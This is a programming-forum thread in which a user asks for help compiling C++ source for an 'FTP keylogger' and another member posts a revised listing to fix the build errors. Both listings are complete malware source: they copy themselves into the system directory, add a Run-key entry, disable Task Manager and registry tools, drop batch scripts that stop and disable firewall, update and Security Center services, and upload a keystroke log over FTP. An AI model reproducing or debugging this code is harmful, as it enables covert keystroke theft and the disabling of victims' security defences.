Keylogger help.

Questions about programming languages and debugging

Keylogger help.

Post by shadow1 »

Hey,

So I found some source code of a nice FTP keylogger, and was wondering why I'm getting these errors when compiling.

Here's the source code


#include <windows.h> 
#include <Winuser.h> 
#include <string> 
#include <fstream>
using namespace std;

// Name of the batch script that OpenBatFile() launches on a timer.
char BatchFile[20] = "system.bat";
// Parameter string passed to the two ShellExecute calls in main(); nothing in
// this listing assigns it.
char* params;

// Thread entry point (started from main() via CreateThread). Loops forever:
// sleeps 300000 ms (five minutes), then launches BatchFile with SW_HIDE so no
// console window is shown. The function never returns a value.
//
// Defender note: main() writes system.bat so that it runs ftp.exe with a
// command script; a hidden, periodic script launch that spawns ftp.exe is a
// process-creation pattern worth alerting on.
DWORD WINAPI OpenBatFile(LPVOID)
{
      for(;;) {
 Sleep(300000);
 ShellExecute(NULL, "open", BatchFile, NULL, NULL, SW_HIDE);}
}


// Maps a Windows virtual-key code to the text this program appends to its
// keystroke log.
//
// Key:     virtual-key code; the caller in main() passes values 8..190.
// Returns: a bracketed label for named keys, a single character for digits,
//          letters, space, newline and '.', or an empty string when no branch
//          matches.
//
// Defender note: the bracketed labels below ("[TABULATOR]", "[SNAPSHOT]", ...)
// end up verbatim in the log file and can serve as content signatures when
// triaging a suspicious text file.
std::string GetKey(int Key) 
{ 
    std::string KeyString = ""; 

    // 8, 13 and 32 are the virtual-key codes for Backspace, Enter and Space;
    // Backspace is recorded with the label "[delete]".
    if (Key == 8) 
        KeyString = "[delete]"; 
    else if (Key == 13) 
        KeyString = "\n"; 
    else if (Key == 32) 
        KeyString = " "; 
    else if (Key == VK_PAUSE) 
        KeyString = "[PAUSE]"; 
    else if (Key == VK_CAPITAL) 
        KeyString = "[CAPITAL]"; 
    else if (Key == VK_SHIFT) 
        KeyString = "[SHIFT]"; 
    else if (Key == VK_TAB) 
        KeyString = "[TABULATOR]"; 
    else if (Key == VK_CONTROL) 
        KeyString = "[CTRL]"; 
    else if (Key == VK_ESCAPE) 
        KeyString = "[ESCAPE]"; 
    else if (Key == VK_END) 
        KeyString = "[END]"; 
    else if (Key == VK_HOME) 
        KeyString = "[HOME]"; 
    else if (Key == VK_LEFT) 
        KeyString = "[LEFT]"; 
    else if (Key == VK_RIGHT) 
        KeyString = "[RIGHT]"; 
    else if (Key == VK_UP) 
        KeyString = "[UP]"; 
    else if (Key == VK_DOWN) 
        KeyString = "[DOWN]"; 
    else if (Key == VK_SNAPSHOT) 
        KeyString = "[SNAPSHOT]"; 
    else if (Key == VK_NUMLOCK) 
        KeyString = "[NUMLOCK]"; 
    // 190 and 110 are the main-keyboard period and the numeric-keypad decimal key.
    else if (Key == 190 || Key == 110) 
        KeyString = "."; 
   
    // 96..105 are the numeric-keypad digits; subtracting 48 yields the ASCII
    // codes '0'..'9'. Assigning an int to std::string stores it as one char.
    else if (Key >=96 && Key <= 105) 
        KeyString = Key-48; 
    // 48..57 are the top-row digits (same values as ASCII '0'..'9'); the range
    // as written also admits 58 and 59.
    else if (Key > 47 && Key < 60) 
        KeyString = Key; 
    // This condition holds for every Key value, so it does not filter anything.
    if (Key != VK_LBUTTON || Key != VK_RBUTTON) 
    { 
        // 65..90 are the letter keys. Case is chosen only from
        // GetKeyState(VK_CAPITAL): non-zero keeps the upper-case code,
        // zero adds 32 to get the lower-case ASCII letter.
        if (Key > 64 && Key < 91) 
        { 
            if (GetKeyState(VK_CAPITAL)) 
                KeyString = Key; 
            else 
            { 
                Key = Key + 32; 
                KeyString = Key; 
            } 
        } 
    } 

    return KeyString; 
} 

// Program entry point. As written it: copies its own executable into the
// system directory as borg.exe; registers that copy under the HKLM Run key;
// writes a DisableTaskMgr policy value for the current user; drops batch files
// that stop security-related services, mark them disabled and set the
// disableregistrytools policy; writes an FTP command script; starts a thread
// that launches the upload batch every five minutes; and then polls the
// keyboard forever, appending what it sees to C:\WINDOWS\system32\log.txt.
// No API return value is checked anywhere in the function.
//
// Defender note: every stage leaves an artefact on disk or in the registry
// (the file names, value names and service names below), which makes this
// listing useful as a checklist of indicators for detection and triage.
int main() 
{
    // Block-scope declaration of a WinMain prototype; nothing in this listing
    // calls it.
    int WINAPI WinMain (HINSTANCE hThisInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpszArgument,
    int nFunsterStil);
    
  // Self-copy: resolve the path of the running image and copy it to
  // <system directory>\borg.exe. A new executable appearing in the system
  // directory outside of patching is a file-creation event worth alerting on.
  char path[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);
    
  char sys[MAX_PATH];
  GetModuleFileName(GetModH, path, sizeof(path));
  GetSystemDirectory(sys, sizeof(sys));
  strcat(sys, "\\borg.exe");
  CopyFile(path, sys, false); 
    
  HKEY hKey, hKey2;
  
  unsigned char reg[2] = "0";
  
  // Persistence and tamper: the value "MS-Windows-secretly" under the HKLM Run
  // key is set to the copied file's path, and a "DisableTaskMgr" value is
  // written under the HKCU Policies\System key. Both are well-known locations
  // to audit for unexpected values.
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
  RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
  RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
  RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
  // Comma expression: only hKey is passed to RegCloseKey.
  RegCloseKey(hKey),(hKey2); 

  // Removes any log file left by an earlier run.
  DeleteFile("C:\\WINDOWS\\system32\\log.txt");  
    
  // Dropped script update.bat: issues "net stop" for Security Center and
  // SharedAccess, builds %Temp%.\kill.reg with Start=dword:00000004 entries
  // for the SharedAccess, wuauserv and wscsvc service keys, imports it with
  // REGEDIT /S, then deletes the .reg file and itself (DEL %0).
  // Defender note: service-stop commands and Start=4 writes against the
  // firewall, Windows Update and Security Center services are strong
  // tamper indicators.
  ofstream FWUP;
  FWUP.open("C:\\WINDOWS\\system32\\update.bat");
  FWUP<<"@echo off\n";
  FWUP<<"net stop ""Security Center""\n";
  FWUP<<"net stop SharedAccess\n";
  FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n"; 
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n"; 
  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n"; 
  FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL %0\n";
  FWUP.close();   
    
  // Dropped script syssvr.bat: uses "reg add" to set the disableregistrytools
  // policy value for the current user.
  ofstream disable;
  disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
  disable<<"@echo off\n";
  disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
  disable.close();  
  
  // FTP command script, stored under the drivers directory with the name
  // config.sys. Server, user and password are placeholders in this listing and
  // are written to disk in clear text; the script sends log.txt in ASCII mode.
  // Defender note: a text file of FTP commands under system32\drivers, and the
  // credentials inside it, are recoverable evidence during incident response.
  //write ur ftp-information's here
  ofstream log;
  log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
  log<<"OPEN myftpserver\n";
  log<<"USER myftpuser\n";
  log<<"myftppassword\n";
  log<<"ASCII\n";
  log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
  log<<"BYE\n";
  log<<"exit\n";
  log.close();
  
  // Dropped script system.bat: runs ftp.exe with -n -i -s: pointing at the
  // command script above. Plain FTP is unencrypted, so the transfer is visible
  // to network monitoring.
  ofstream Ausgabe;
  Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
  Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
  Ausgabe<<"bye\n";
  Ausgabe<<"exit\n";
  Ausgabe.close();
  
  // Runs the two tamper scripts once, with hidden windows.
  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\syssvr.bat", params, NULL, SW_HIDE);
  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\update.bat", params, NULL, SW_HIDE);
  
  DWORD OpenBatch;
  
  // Background thread that periodically launches the upload batch; the handle
  // is not used again in this listing.
  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);
    
    std::string Filename = "C:\\WINDOWS\\system32\\log.txt"; 
    std::string TempString = ""; 
    std::fstream FStream; 
    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app); 

    // Capture loop: every 5 ms, poll virtual-key codes 8..190 with
    // GetAsyncKeyState and append the GetKey() text for each hit to the log.
    // The file is closed and reopened after every write. The loop has no exit.
    // Defender note: high-frequency GetAsyncKeyState polling across the whole
    // key range is a common behavioural signal for keystroke capture.
    while(true) 
    { 
        // 0% CPU
        Sleep(5); 

        for(int i = 8; i < 191; i++) 
        { 
           // == binds tighter than &, so this evaluates
           // GetAsyncKeyState(i) & (1 == 1), i.e. it tests the low bit;
           // presumably the line the C4554 warning in the build log refers to.
           if(GetAsyncKeyState(i)&1 ==1) 
           { 
                TempString = GetKey (i); 

                FStream.write(TempString.c_str(), TempString.size()); 
                FStream.close(); 
                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app); 
           } 
        } 
    } 
} 
And now, when I compile it with precompiled headers off, I get these errors:


	

1>------ Build started: Project: keylog, Configuration: Debug Win32 ------
1>Compiling...
1>keylog.cpp
1>.\keylog.cpp(14) : error C2664: 'ShellExecuteW' : cannot convert parameter 2 from 'const char [5]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(91) : error C2664: 'GetModuleFileNameW' : cannot convert parameter 2 from 'char [260]' to 'LPWCH'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(92) : error C2664: 'GetSystemDirectoryW' : cannot convert parameter 1 from 'char [260]' to 'LPWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(94) : error C2664: 'CopyFile' : cannot convert parameter 1 from 'char [260]' to 'LPCTSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(100) : error C2664: 'RegOpenKeyExW' : cannot convert parameter 2 from 'const char [46]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(101) : error C2664: 'RegSetValueExW' : cannot convert parameter 2 from 'const char [20]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(102) : error C2664: 'RegCreateKeyW' : cannot convert parameter 2 from 'const char [58]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(103) : error C2664: 'RegSetValueExW' : cannot convert parameter 2 from 'const char [15]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(106) : error C2664: 'DeleteFile' : cannot convert parameter 1 from 'const char [28]' to 'LPCTSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(154) : error C2664: 'ShellExecuteW' : cannot convert parameter 3 from 'const char [31]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(155) : error C2664: 'ShellExecuteW' : cannot convert parameter 3 from 'const char [31]' to 'LPCWSTR'
1>        Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
1>.\keylog.cpp(173) : warning C4554: '&' : check operator precedence for possible error; use parentheses to clarify precedence
1>AssemblyInfo.cpp
1>Generating Code...
1>Build log was saved at "file://c:\Documents and Settings\Dan\My Documents\Visual Studio 2008\Projects\keylog\keylog\Debug\BuildLog.htm"
1>keylog - 11 error(s), 1 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

Help me out please :S


Post by ayu »

Well, the reasons could be many, since many errors are usually the result of one error (chain reaction). Check the code for line breaks, since they're common when you cut and paste others' code.

Best bet is to learn C++ instead, and make your own keylogger ^^
"The best place to hide a tree, is in a forest"


Post by ayu »

I didn't have anything else to do, so I debugged the code a little ... it's not 100%, since it seems that the issue is not really the code, it's the compiler. But I modified it a bit, and it should work now for your compiler as well.

Just the fact that the coder used for( ; ; ) worries me....


#include <windows.h>
#include <Winuser.h>
#include <string>
#include <fstream>
#include <tchar.h>
using namespace std;

// Batch script name; in this revision OpenBatFile() passes its own literal to
// ShellExecute, and nothing else in the listing reads this array.
char BatchFile[20] = "system.bat";
// Declared but never assigned; this revision's ShellExecute calls pass the
// literal _T("params") rather than this pointer.
char* params;

// Thread entry point (started from main() via CreateThread). Loops forever:
// sleeps 300000 ms (five minutes), then launches "system.bat" with SW_HIDE so
// no console window is shown. The function never returns a value.
//
// Defender note: main() writes system.bat so that it runs ftp.exe with a
// command script; a hidden, periodic script launch that spawns ftp.exe is a
// process-creation pattern worth alerting on.
DWORD WINAPI OpenBatFile(LPVOID)
{
	while(true) {
		Sleep(300000);
		
		ShellExecute(NULL, L"open", L"system.bat", NULL, NULL, SW_HIDE);

	}
}


// Maps a Windows virtual-key code to the text this program appends to its
// keystroke log.
//
// Key:     virtual-key code; the caller in main() passes values 8..190.
// Returns: a bracketed label for named keys, a single character for digits,
//          letters, space, newline and '.', or an empty string when no branch
//          matches.
//
// Defender note: the bracketed labels below ("[TABULATOR]", "[SNAPSHOT]", ...)
// end up verbatim in the log file and can serve as content signatures when
// triaging a suspicious text file.
std::string GetKey(int Key)
{
    std::string KeyString = "";

    // 8, 13 and 32 are the virtual-key codes for Backspace, Enter and Space;
    // Backspace is recorded with the label "[delete]".
    if (Key == 8)
        KeyString = "[delete]";
    else if (Key == 13)
        KeyString = "\n";
    else if (Key == 32)
        KeyString = " ";
    else if (Key == VK_PAUSE)
        KeyString = "[PAUSE]";
    else if (Key == VK_CAPITAL)
        KeyString = "[CAPITAL]";
    else if (Key == VK_SHIFT)
        KeyString = "[SHIFT]";
    else if (Key == VK_TAB)
        KeyString = "[TABULATOR]";
    else if (Key == VK_CONTROL)
        KeyString = "[CTRL]";
    else if (Key == VK_ESCAPE)
        KeyString = "[ESCAPE]";
    else if (Key == VK_END)
        KeyString = "[END]";
    else if (Key == VK_HOME)
        KeyString = "[HOME]";
    else if (Key == VK_LEFT)
        KeyString = "[LEFT]";
    else if (Key == VK_RIGHT)
        KeyString = "[RIGHT]";
    else if (Key == VK_UP)
        KeyString = "[UP]";
    else if (Key == VK_DOWN)
        KeyString = "[DOWN]";
    else if (Key == VK_SNAPSHOT)
        KeyString = "[SNAPSHOT]";
    else if (Key == VK_NUMLOCK)
        KeyString = "[NUMLOCK]";
    // 190 and 110 are the main-keyboard period and the numeric-keypad decimal key.
    else if (Key == 190 || Key == 110)
        KeyString = ".";
   
    // 96..105 are the numeric-keypad digits; subtracting 48 yields the ASCII
    // codes '0'..'9'. Assigning an int to std::string stores it as one char.
    else if (Key >=96 && Key <= 105)
        KeyString = Key-48;
    // 48..57 are the top-row digits (same values as ASCII '0'..'9'); the range
    // as written also admits 58 and 59.
    else if (Key > 47 && Key < 60)
        KeyString = Key;
    // This condition holds for every Key value, so it does not filter anything.
    if (Key != VK_LBUTTON || Key != VK_RBUTTON)
    {
        // 65..90 are the letter keys. Case is chosen only from
        // GetKeyState(VK_CAPITAL): non-zero keeps the upper-case code,
        // zero adds 32 to get the lower-case ASCII letter.
        if (Key > 64 && Key < 91)
        {
            if (GetKeyState(VK_CAPITAL))
                KeyString = Key;
            else
            {
                Key = Key + 32;
                KeyString = Key;
            }
        }
    }

    return KeyString;
}

// Program entry point of the revised listing posted in the reply. The stages
// are the same as in the original post: a self-copy step, a Run-key value and
// a DisableTaskMgr policy value, dropped batch files that stop and disable
// security-related services and set the disableregistrytools policy, an FTP
// command script, a background thread that launches the upload batch, and an
// endless keyboard-polling loop that appends to C:\WINDOWS\system32\log.txt.
// No API return value is checked.
//
// NOTE(review): the reply changed several arguments to wide or _T() literals
// to satisfy a Unicode build; the listing now mixes char buffers, a TCHAR
// buffer and string literals, and the thread does not show this revision
// building or running. Treat the comments below as a description of intent.
//
// Defender note: the file names, registry value names and service names below
// are the indicators to look for on a host.
int main()
{
    // Block-scope declaration of a WinMain prototype; nothing in this listing
    // calls it.
    int WINAPI WinMain (HINSTANCE hThisInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpszArgument,
    int nFunsterStil);
   
  // Self-copy step (path of the running image, system directory, borg.exe).
  // A new executable appearing in the system directory outside of patching is
  // a file-creation event worth alerting on.
  TCHAR path[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);
   
  char sys[MAX_PATH];
  GetModuleFileName(GetModH, path, sizeof(path));
  GetSystemDirectory(_T("sys"), sizeof(sys));
  strcat(sys, "\\borg.exe");
  CopyFile(path, _T("sys"), false);
   
  HKEY hKey, hKey2;
 
  unsigned char reg[2] = "0";
 
  // Persistence and tamper: a value named "MS-Windows-secretly" under the HKLM
  // Run key and a "DisableTaskMgr" value under the HKCU Policies\System key.
  // Both are well-known locations to audit for unexpected values.
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
  RegSetValueEx(hKey, L"MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
  RegCreateKey(HKEY_CURRENT_USER,L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
  RegSetValueEx(hKey2,L"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
  // Comma expression: only hKey is passed to RegCloseKey.
  RegCloseKey(hKey),(hKey2);

   
  // Dropped script update.bat: issues "net stop" for Security Center and
  // SharedAccess, builds %Temp%.\kill.reg with Start=dword:00000004 entries
  // for the SharedAccess, wuauserv and wscsvc service keys, imports it with
  // REGEDIT /S, then deletes the .reg file and itself (DEL %0).
  // Defender note: service-stop commands and Start=4 writes against the
  // firewall, Windows Update and Security Center services are strong
  // tamper indicators.
  ofstream FWUP;
  FWUP.open("C:\\WINDOWS\\system32\\update.bat");
  FWUP<<"@echo off\n";
  FWUP<<"net stop ""Security Center""\n";
  FWUP<<"net stop SharedAccess\n";
  FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL %0\n";
  FWUP.close();   
   
  // Dropped script syssvr.bat: uses "reg add" to set the disableregistrytools
  // policy value for the current user.
  ofstream disable;
  disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
  disable<<"@echo off\n";
  disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
  disable.close(); 
 
  // FTP command script, stored under the drivers directory with the name
  // config.sys. Server, user and password are placeholders in this listing and
  // are written to disk in clear text; the script sends log.txt in ASCII mode.
  // Defender note: a text file of FTP commands under system32\drivers, and the
  // credentials inside it, are recoverable evidence during incident response.
  //write ur ftp-information's here
  ofstream log;
  log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
  log<<"OPEN myftpserver\n";
  log<<"USER myftpuser\n";
  log<<"myftppassword\n";
  log<<"ASCII\n";
  log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
  log<<"BYE\n";
  log<<"exit\n";
  log.close();
 
  // Dropped script system.bat: runs ftp.exe with -n -i -s: pointing at the
  // command script above. Plain FTP is unencrypted, so the transfer is visible
  // to network monitoring.
  ofstream Ausgabe;
  Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
  Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
  Ausgabe<<"bye\n";
  Ausgabe<<"exit\n";
  Ausgabe.close();
 
  // Launches the two tamper scripts once, with hidden windows.
  ShellExecute(NULL, NULL, L"C:\\WINDOWS\\system32\\syssvr.bat", _T("params"), NULL, SW_HIDE);
  ShellExecute(NULL, NULL, L"C:\\WINDOWS\\system32\\update.bat", _T("params"), NULL, SW_HIDE);
 
  DWORD OpenBatch;
 
  // Background thread that periodically launches the upload batch; the handle
  // is not used again in this listing.
  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);
   
    std::string Filename = "C:\\WINDOWS\\system32\\log.txt";
    std::string TempString = "";
    std::fstream FStream;
    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

    // Capture loop: every 5 ms, poll virtual-key codes 8..190 with
    // GetAsyncKeyState and append the GetKey() text for each hit to the log.
    // The file is closed and reopened after every write. The loop has no exit.
    // Defender note: high-frequency GetAsyncKeyState polling across the whole
    // key range is a common behavioural signal for keystroke capture.
    while(true)
    {
        // 0% CPU
        Sleep(5);

        for(int i = 8; i < 191; i++)
        {
           // Logical AND with the constant (1==1): the branch is taken for any
           // non-zero GetAsyncKeyState return value.
           if(GetAsyncKeyState(i) && 1==1)
           {
                TempString = GetKey (i);

                FStream.write(TempString.c_str(), TempString.size());
                FStream.close();
                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
           }
        }
    }
} 
"The best place to hide a tree, is in a forest"


Post by shadow1 »

Wow, thanks for that.

So far, it's gone down from 11 errors to 1.

Here is the compile log:


1>------ Build started: Project: keylog22, Configuration: Debug Win32 ------
1>Compiling...
1>keylog22.cpp
1>.\keylog22.cpp(1) : warning C4627: '#include <windows.h>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(2) : warning C4627: '#include <Winuser.h>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(3) : warning C4627: '#include <string>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(4) : warning C4627: '#include <fstream>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(5) : warning C4627: '#include <tchar.h>': skipped when looking for precompiled header use
1>        Add directive to 'stdafx.h' or rebuild precompiled header
1>.\keylog22.cpp(187) : fatal error C1010: unexpected end of file while looking for precompiled header. Did you forget to add '#include "stdafx.h"' to your source?
1>Build log was saved at "file://c:\Documents and Settings\Dan\My Documents\Visual Studio 2008\Projects\keylog22\keylog22\Debug\BuildLog.htm"
1>keylog22 - 1 error(s), 5 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========



Post by ayu »

That's most likely an error with your compiler, and I don't have any time atm to help you with that. So all I can say is google ^^
"The best place to hide a tree, is in a forest"
